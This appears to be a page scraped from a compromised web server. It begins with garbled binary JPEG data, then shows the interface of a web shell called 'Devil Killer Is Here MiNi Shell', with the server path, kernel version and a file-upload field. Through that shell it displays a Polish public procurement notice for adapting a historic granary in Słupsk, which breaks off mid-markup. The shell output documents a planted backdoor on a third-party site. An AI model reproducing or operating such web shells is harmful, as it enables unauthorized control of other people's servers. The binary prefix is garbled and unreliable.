JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220301/0007110502-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Adaptacja zabytkowego Spichlerza w Słupsku na cele kulturalne, społeczne, edukacyjne i turystyczne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191674836</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okopowa 21/27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-810</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 326 87 58</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pomorskie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pomorskie.eu/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Adaptacja zabytkowego Spichlerza w Słupsku na cele kulturalne, społeczne, edukacyjne i turystyczne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c6c36bdf-9618-11ec-9bc1-c2db95d08897</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00071105</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003589/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Adaptacja zabytkowego Spichlerza w Słupsku na cele kulturalne, społeczne, edukacyjne i turystyczne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem https://miniportal.uzp.gov.pl dalej jako „Platforma”.<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>oraz poczty elektronicznej: sekretariat@muzeum.slupsk.pl.<br/>Link do postępowania dostępny jest na stronie internetowej Zamawiającego:<br/>https://www.bip.pomorskie.eu/m,12,zamowienia-publiczne.html<br/>https://miniportal.uzp.gov.pl<br/>Wymagania techniczne i organizacyjne opisane zostały w Instrukcji użytkowania systemu<br/>(https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf).<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>1) Microsoft Internet Explorer od wersji 11.0<br/>2) Mozilla Firefox od wersji 15<br/>3) Google Chrome od wersji 20<br/>4) Microsoft Edge<br/>UWAGA: Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty w wysokości 150 MB.<br/>Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>znajdują się w Instrukcji użytkowania systemu (https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal ePUAP.pdf).<br/>Formaty plików:<br/>1) Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”, zwanego dalej Rozporządzeniem KRI.<br/>2) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf<br/>3) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip, .7Z<br/>4) Uwaga! W Rozporządzeniu KRI nie występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich formatach zostaną<br/>uznane za złożone nieskutecznie.<br/>5) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie<br/>10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który<br/>wynosi maksymalnie 5MB.<br/>Formaty podpisów kwalifikowanych:<br/>1) ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>2) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. W tym przypadku Wykonawca powinien<br/>pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>3) Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>4) Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym. Może to<br/>skutkować brakiem integralności plików.<br/>5) Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju.<br/>Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>6) Podpisy kwalifikowane wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie<br/>Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych<br/>na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>Zaleca się złożenie oferty z wyprzedzeniem minimum 24h, aby zdążyć w terminie przewidzianym na jej złożenie w przypadku siły<br/>wyższej, jak np. awaria Platformy, awaria internetu, inne problemy techniczne.<br/>Ofertę należy złożyć na Platformie pod adresem https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE<br/>L 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że: Administratorem Pani/Pana danych osobowych jest Zarząd Województwa<br/>Pomorskiego z siedzibą ul. Okopowa 21/27, 80-810 Gdańsk. Pozostałe nasze dane kontaktowe to: zamowienia@pomorskie.eu, tel.<br/>58 32 68 758;<br/>W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z IOD pod adresem e-mai: iod@pomorskie.eu lub<br/>telefonicznie pod nr tel. 58 32 68 518; Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania i<br/>udzieleniu zamówienia, prowadzenia dokumentacji księgowo-podatkowej, archiwizacji danych, dochodzenia roszczeń lub obrony<br/>przed roszczeniami. Podstawą przetwarzania danych osobowych jest: ustawa z 11.9.2019 r. – Pzp; ustawa z 27.8.2009 r. o<br/>finansach publicznych; ustawa z 14.7.1983 r. o narodowym zasobie archiwalnym i archiwach; art. 6 pkt.1 lit. c RODO<br/>Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych umów powierzenia oraz uprawnione na mocy<br/>obowiązujących przepisów prawa, w szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania<br/>na podstawie art. 18 oraz art. 74–76 ustawy Pzp. Zasada jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem<br/>danych, o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych). Pani/Pana dane osobowe będą przetwarzane przez<br/>okres niezbędny do realizacji celu przetwarzania oraz przez okres wynikający z przepisów w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w<br/>szczególności zgodnie z art. 78 ust. 1 i 4 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata – przez cały okres obowiązywania<br/>umowy.<br/>Posiada Pani/Pan prawo: żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku, wymagałoby niewspółmiernie<br/>dużego wysiłku, zamawiający może, zgodnie z art. 75 ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76 ustawy Pzp wykonanie tego obowiązku nie może<br/>naruszać integralności protokołu postępowania oraz jego załączników; usunięcia danych w przypadku, gdy dane osobowe nie są już<br/>niezbędne do celów, w których zostały zebrane, lub w inny sposób przetwarzane; żądania ograniczenia przetwarzania danych<br/>osobowych; zgodnie z art. 74 ust. 3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenie postępowania o udzielenie zamówienia. Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj.<br/>Urzędu Ochrony Danych Osobowych ul. Stawki 2, 00-913 Warszawa. Pani/Pana dane osobowe nie będą poddawane<br/>zautomatyzowanemu podejmowaniu decyzji, w tym również profilowaniu. Pani/Pana dane osobowe nie będą przekazywane do<br/>państw trzecich. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanych z udziałem w<br/>postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych danych wynikają z PZP. Jednocześnie Zamawiający<br/>przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których<br/>dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od<br/>wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14<br/>ust.5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAZ-Z.272.25.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 9407208,49 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem są roboty remontowo-budowalne związane z realizacją zadania inwestycyjnego pn. „Adaptacja zabytkowego<br/>Spichlerza w Słupsku na cele kulturalne, społeczne, edukacyjne i turystyczne”.<br/>Zamówienie jest dofinansowane z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych, Wstępna<br/>promesa nr 01/2021/5351/PolskiLad.<br/>Przedmiot zamówienia obejmuje wykonanie robót budowlano - remontowych rozbudowy i przebudowy budynku<br/>„Czerwonego Spichlerza” na dz. nr 194/3 wpisanego do rejestru zabytków pod nr A-1895 z przeznaczeniem obiektu na<br/>funkcję edukacyjną, biblioteczną, znajdą się w nim: księgozbiór, pomieszczenia konserwacji zabytków i magazyny<br/>eksponatów muzealnych wraz z kompletem instalacji wodociągowej, c.o., kanalizacji sanitarnej, kanalizacji deszczowej,<br/>elektrycznych i teletechnicznych, przeciwpożarowej, wentylacji mechanicznej z elementami klimatyzacji w niektórych<br/>pomieszczeniach.<br/>Projekt zakłada przebudowę z zachowaniem historycznego kształtu i architektury, ścianki wewnętrzne i dobudowany szyb<br/>windowy zostaną usunięte. Do budynku zostanie dobudowana przeszklona klatka schodowa. Przewiduje się wymianę i<br/>modernizację zniszczonych elementów konstrukcji, nowe instalacje, węzły sanitarne, izolacje, ściany działowe i<br/>wykończenie wnętrz oraz uzupełnienie i rekonstrukcję detali architektonicznych, licówki itp. Zachowano istniejący kształt i<br/>konstrukcje dachu; wysokości kalenic i nachylenie dachu bez zmian. Przewiduje się całkowitą wymianę pokrycia dachowego<br/>łącznie z deskowaniem. Istniejące nadbudówki do likwidacji.<br/>Podstawowe dane budynku objętego przedmiotem zamówienia: budynek objęty robotami budowlano-remontowymi,<br/>rozbudowy i przebudowy - „Czerwony Spichlerz” na dz. nr 194/3, wpisany do rejestru zabytków pod nr A-1895, dane<br/>techniczne:<br/>• długość budynku: 26,50 m,<br/>• szerokość budynku: 17,40 m,<br/>• dobudowa długość : 20,30 mb<br/>• dobudowa szerokość : 4,06 mb<br/>• wysokość budynku: 12,55 m,<br/>• powierzchnia użytkowa: 1.649,02 m2,<br/>• powierzchnia zabudowy: 541,80 m2,<br/>• kubatura: 6.507,60 m3;<br/>Szczegółowy zakres prac związany z robotami budowlanymi został określony w następujących dokumentach: załączniki do<br/>SWZ od numeru 8 do 22.<br/>Zamawiający przewiduje również możliwość złożenia oferty po odbyciu przez Wykonawców wizji lokalnej, która<br/>przeprowadzona zostanie w:<br/>Czerwony Spichlerz, ulica Szarych Szeregów 12, 76-200 Słupsk,<br/>w dniu 08 marca 2022 r., o godzinie 11:00,<br/>osoba do kontaktu w sprawie wizji: Tadeusz Minta, tel. 059 842 40 81 (wew. 316),<br/>e-mail: inwestycjemps@muzeum.slupsk.pl<br/>Udział Wykonawców w wizji lokalnej nie jest obowiązkowy. Zamawiające zaleca wcześniejsze potwierdzenie udziału w wizji<br/>wraz z przekazaniem danych do kontaktu.<br/>Wszędzie tam, gdzie przy opisie przedmiotu zamówienia, powołane są normy, aprobaty, specyfikacje techniczne i systemy<br/>odniesienia, bądź wskazane są znaki towarowe, parametry lub źródła pochodzenia (nazwy producentów lub urządzeń),<br/>postanowienia te należy traktować jako przykładowe, a Wykonawca ma każdorazowo prawo zastosowania rozwiązania<br/>równoważnego z tym zastrzeżeniem, iż zaproponowane rozwiązania również muszą spełniać co najmniej założenia<br/>projektowe.<br/>Wykonawca zobowiązany jest do spełnienia wymagań nałożonych w art. 68 ust. 3 ustawy<br/>z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych (t.j.: Dz. U. z 2021 r. poz. 110 z późn zm.) w<br/>zakresie posiadania odpowiedniej ilości pojazdów we flocie użytkowanych pojazdów przy wykonywaniu przedmiotu umowy,<br/>tj. łączny udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie pojazdów samochodowych w<br/>rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym używanych przy wykonywaniu tego<br/>zadania wynosi co najmniej 10%.<br/>Wymagania dotyczące zatrudnienia osób wykonujących czynności związane z realizacją zamówienia:<br/>1) Na podstawie 95 ust. 1 ustawy Pzp, Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na<br/>podstawie umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy osób wykonujących roboty<br/>budowlane pod nadzorem kierownika budowy, o ile mieszczą się one w zakresie art. 22 §1 Kodeksu Pracy, który brzmi:<br/>„Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz<br/>pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca – do<br/>zatrudniania pracownika za wynagrodzeniem”. Za roboty budowlane wykonywane pod nadzorem kierownika budowy<br/>rozumie się wszelkie roboty ogólnobudowlane, o których mowa w przedmiocie zamówienia oraz wykonania robót<br/>dotyczących konstrukcji, wykonywane bezpośrednio przez pracowników pozostających pod nadzorem kierownika budowy.<br/>2) Jeżeli czynności wskazane w pkt 1 spełniające przesłanki art. 22 § 1 Kodeksu Pracy Wykonawca będzie Wykonywał samodzielnie (jako właściciel/współwłaściciel) Zamawiający uzna to za spełnienie warunku zatrudnienia na umowę o pracę<br/>osób wykonujących czynności związane z realizacją zamówienia.<br/>3) Wykonawca w umowie oświadczy, iż osoba lub osoby, wykonujące wszelkie roboty ogólnobudowlane zgodnie z opisem<br/>przedmiotu zamówienia wykonywane bezpośrednio przez pracowników pozostających pod nadzorem kierownika budowy w<br/>trakcie realizacji zamówienia, o których mowa w rozdziale IV ust. 22 pkt 1 SWZ są lub będą zatrudnione na podstawie<br/>umowy o pracę w rozumieniu ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy.<br/>4) Zamawiający będzie uprawniony do kontroli spełniania przez Wykonawcę wymagań dotyczących zatrudnienia<br/>osoby/osób, którym zostanie powierzona realizacja Przedmiotu umowy, o których mowa w rozdziale IV ust. 22 pkt 1 SWZ.<br/>5) Zamawiający informuje, iż w razie jakichkolwiek wątpliwości odnośnie zatrudnienia przez Wykonawcę lub podwykonawcę<br/>osób wykonujących czynności na podstawie umowy<br/>o pracę, uprawniony jest do powiadomienia właściwego inspektoratu pracy i zwrócenia się o przeprowadzenie przez niego<br/>kontroli.<br/>6) Zatrudnienie osób, o których mowa w rozdziale IV ust. 22 pkt 1 SWZ powinno trwać nieprzerwanie przez cały okres<br/>realizacji danej czynności.<br/>7) Uprawnienia Zamawiającego w zakresie sankcji z tytułu niespełnienia wymagań określonych w rozdziale IV ust. 22 pkt 1<br/>SWZ, zostały uregulowane w projekcie umowy, stanowiącym załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32410000-0 - Lokalna sieć komputerowa</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45262690-4 - Remont starych budynków</p> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331210-1 - Instalowanie wentylacji</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span 